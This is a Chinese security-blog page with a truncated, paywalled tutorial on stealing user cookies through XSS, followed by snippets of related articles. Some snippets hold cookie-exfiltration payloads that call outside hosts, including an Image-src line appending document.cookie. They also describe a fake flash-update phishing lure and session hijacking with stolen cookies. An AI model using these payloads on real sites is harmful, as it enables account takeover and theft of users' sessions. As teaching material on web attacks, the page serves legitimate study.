利用XSS窃取用户Cookie

最新推荐文章于 2025-06-13 23:35:49 发布
最新推荐文章于 2025-06-13 23:35:49 发布
阅读量7.7k 收藏 60
点赞数 13
CC 4.0 BY-SA版权
分类专栏: XSS web安全 文章标签: cookie窃取 xss漏洞 xss利用
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Monsterlz123/article/details/96608521

【XSS】利用XSS窃取用户Cookie

Hello,各位小伙伴周六愉快。
在这里插入图片描述
晃眼之间一周又快要过去了,时间是不等人滴~~

这周准备连发三篇XSS相关内容,两篇实战,一篇总结。

然后XSS漏洞部分就暂时完结啦~~
在这里插入图片描述
今天我们来看看怎么利用XSS窃取用户cookie吧。

一、实验概述

实验拓扑:
在这里插入图片描述
XSS的用途之一就是窃取用户的cookie,攻击者利用XSS在网站中插入恶意脚本,一旦用户访问该网页,cookie就会自动地发送到攻击者的服务器中去。

使用cookie我们可以实现免密登陆,如果能够盗取网站管理员的cookie,那么就可以用管理员的身份直接登录网站后台,而不必非要去获得管理员账号和密码了。

关于cookie的原理,在前面讲过一期,这里就不赘述了。

有兴趣的小伙伴可以看一下。

二、编写远端接收代码

在攻击者服务器搭建一个php页面,用于收取远端传过来的cookie,代码如下:

在这里插入图片描述

代码解释如下:

通过$_GET

最低0.47元/天 解锁文章

200万优质内容无限畅学
XSS-窃取Cookie及拓展
2301_76631050的博客
07-23 2015
步骤一:来到xss平台 点击公共模块---flash弹窗钓⻥-查看将其中的代码保存成⼀个js⽂件放到我们⽹站的根⽬录下⾯。步骤二:用记事本打开1.js 修改js中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址。步骤七:点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"...步骤⼋:配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!步骤二:在我的项目中选择我们刚创建的项目,点击右上角的查看配置代码。把文件复制到我们网站的根目录下。
XSS漏洞XSS攻击平台-窃取Cookie
muyuchen110的博客
07-23 904
XSS漏洞基础:XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS) 的缩写混淆,故将跨站脚本攻击缩写为 XSSXSS 是⼀种在 web 应⽤中的计算机安全漏洞,它允许恶意web⽤户将代码植⼊到 web ⽹站⾥⾯,供给其它⽤户访问,当⽤户访问到有恶意代码的⽹⻚就会产⽣ xss 攻击;漏洞概念:⽬标未对⽤户从前端功能点输⼊的数据与输出的内容未进⾏处理或者处理不当,从⽽导致恶意的JS代码被执⾏造成窃取⽤户信息劫持WEB⾏为危害的。
【安全】P 4-2 XSS盗取cookie
Z_David_Z的博客
02-17 569
目录0X01 cookie介绍0X02 反射XSS盗取cookie0X03 利用cookie会话劫持0X04 劫持会话后的操作 0X01 cookie介绍 Cookie 是在 HTTP 协议下,服务器或脚本可以维护客户工作站上信息的一种方式。Cookie 是由 Web 服务器保存在用户浏览器(客户端)上的小文本文件,它可以包含有关用户的信息。 目前有些 Cookie 是临时的,有些则是持续的。临时的 Cookie 只在浏览器上保存一段规定的时间,一旦超过规定的时间,该 Cookie 就会被系统清除 服务器可
渗透实战:利用XSS获取cookie和密码
最新发布
ericalezl的博客
06-13 772
之后点击轮询可以看到目标向的域名发送的请求,找到一个请求中带有 secret 和 session 字样的就是 cookie 信息。将复制的域名放到 fetch 中,body 为 document.cookie,就是访问这个留言板的用户cookie。访问 my-account 转包,将 cookie 替换重放即可登录管理员账户。留言板位置找到注入 xss 的位置后,构造获取对方密码的请求。输入的任何单引号双引号尖括号都会被 unicode 编码。直接换另一种代码执行方式。里面可以执行 js 代码。
xsscookie窃取
weixin_30911809的博客
03-07 629
一、窃取cookie有什么用? cookie相当于一个身份证 有了管理员的cookie我们不需要帐号密码就可以登陆 二、反射型xss有存贮型xss什么区别? 反射 xss和服务器没有交互 只能用一次 储存 xss和服务器有交互 可以反复使用 危害较大 三、本次教程用到的工具 1.phpstudy(PHP调试环境的程序集成包) 2.dv...
XSS攻击之窃取Cookie
weixin_34032792的博客
08-15 155
2019独角兽企业重金招聘Python工程师标准>>> ...
网络安全学习笔记——盗取Cookies跨站脚本(XSS
just do it
07-24 2601
使用替换过了的URL发给目标,诱导目标点击,然后目标的cookies就会回弹到XSS攻击平台上,展开就可以看到该目标的PHPSESSID,然后在自己的同源网站上,笔记本按Fn+F12,调出Hackerbar,点击存储,然后把PHPSESSID换成攻击之后得到的,删掉浏览框里面多余的东西,剩下XXX.php即可,刷新之后就会登录该目标的账号——,SESSID——中间键,是Apache分配的,唯一的“身份证”,从SESSID入手,就可以查取用户的相关信息。
利用XSS盗取cookie
huchendushen的专栏
01-11 1770
转载自:http://danqingdani.blog.163.com/blog/static/18609419520133182254580/ 试验环境: 攻击机器  10.1.36.181 stealcookies.php cookie.txt 受害服务器 10.1.36.34 victim.php victim.html (1)受害者有xss
简单的利用XSS获取用户cookie
shy的博客
10-25 4606
跨站脚本攻击(XSS) 跨站脚本攻击(Cross Site Scripting),为了不和层叠样式表(Cascading Style Sheets, CSS)的缩写混淆,故将跨站脚本攻击缩写为XSS。恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。 这里简单的演示下,将cookie获取到自己的搭...
XSS实现cookie盗取
一期一会的博客
04-08 1210
XSS实现cookie盗取 在一台win7上搭建xss,另外一台搭建留言板(一个网站),两台虚拟机之间能够ping通,在留言板上留言,管理员回复留言,xss获取cookie,利用中国菜刀通过获取cookie用管理员账号登录。 实验环境: ​ Windows 7 192.168.1.128 (搭建xss) ​ Windows 7 192.168.1.100 (安装小旋风) xss平台搭建好以后,进入管理员账户,复制邀请码,退出登录,利用邀请码重新注册一个test11的账户
使用xss钓鱼盗取用户cookie
m0_74805513的博客
07-27 1363
那么可以看到第一步写入成功了,将cookie写入了我们事先建立好的网站,并且保存了下来,我们在点开gtck.html 去更加细致的查看里面是否有我们保存的cookie。这行代码也很简单,就是加载后转到我们搭建的web网页,向我们的网页传入用户cookie,document.location='url'起到页面加载后转到。很简单的一个网页主要用来接收用户cookie,然后写入gtck.html文件里,然后我们在创建gtck.html文件,用来保存用户cookie
TOP16-XSS -- 小黑超细详解-+案例说明(盗取cookie登录)<宝藏文>
G_WEB_Xie的博客
04-03 1502
概念:通常指通过HTML注入篡改了网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击。当入侵网站后,通过自己编定的脚本或者木马嵌入到网站页面,利用网站的流量将自己的网页木马传播出去从而达到自己的目的,当用户浏览网站的时候点击了编订的恶意程序脚本,从而达到获取用户信息,进行一系列未授权的操作。通俗理解:此漏洞主要以盗取用户信息, 获取用户的权限做一些越权操作,还可以结合其它漏洞进行一系列的攻击行为。
【网络安全 --- XSS漏洞利用实战】你知道如何利用XSS漏洞进行cookie获取,钓鱼以及键盘监听吗?--- XSS实战篇
m0_67844671的博客
10-05 5659
你知道xss漏洞如何利用吗?本篇文章详细介绍了利用XSS漏洞如何实现cookie盗取,钓鱼获取用户名密码以及监听键盘记录等,让你对xss漏洞有进一步认识。
XSS 盗取 Cookie 实验
m0_63645854的博客
04-01 515
本文主要介绍了XSS盗取Cookie流程
XSS平台偷取cookie使用+XSS漏洞
NSQ0207的博客
07-24 3313
在线利用网站:复制代码输入复制的代码查看获取到的cookie二、xss触发方式(1)在标签外:(2)在标签内:使用事件型:(先用引号闭合,看看是否有过滤如果有使用大小写试验)在标签内不能使用标签,使用标签标签内资源类型是url使用伪协议。
XSS(偷你的Cookies)
热门推荐
qq_27552077的博客
03-12 1万+
XSS(Cross Site Scripting),跨站脚本攻击,取名XSS是避免和CSS同名。XSS攻击原理:攻击者向有XSS漏洞的网站中输入(传入)恶意的HTML代码,当其它用户浏览该网站时,这段HTML代码会自动执行,从而达到攻击的目的。同时这也因为HTTP采用的明文模式,这样就让黑客有机可乘了(在我另一篇文章介绍过利用fiddle可以捕获HTTP报文)。我发现网上很多关于XSS攻击的文章都没
利用xsscookie教学
cnbird's blog
06-24 4629
使用的工具: 1.免费网页支援PHP 2.存在xss的脆弱的网站。 vb.php为存放cookie的网页 PHP Code:Cookies Stealther - Designed and programmed by R00t[ATI]or="#C0C0C0">COOKIES STEALTHERBy R00T[AT
XSS平台获取cookie
qq_41048303的博客
02-19 3798
XSS平台获取cookie 1.环境介绍 靶场:pikachu XSS平台:BLUE-LOTUS 浏览器:火狐浏览器 2.流程介绍 登录XSS平台,创建获取cookie的脚本 var website = "http://网站地址"; (function() { (new Image()).src = website + '/?keepsession=1&location=' + escape((function() { try { return d
xss攻击之窃取用户cookie
特务阿⑦的博客
08-18 825
引用链接:https://blog.fundebug.com/2017/08/16/xss_steal_cookie/ 下面的的JavaScript代码就可以窃取Cookie,是不是很简单?<script> new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie); </script>在IE浏
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值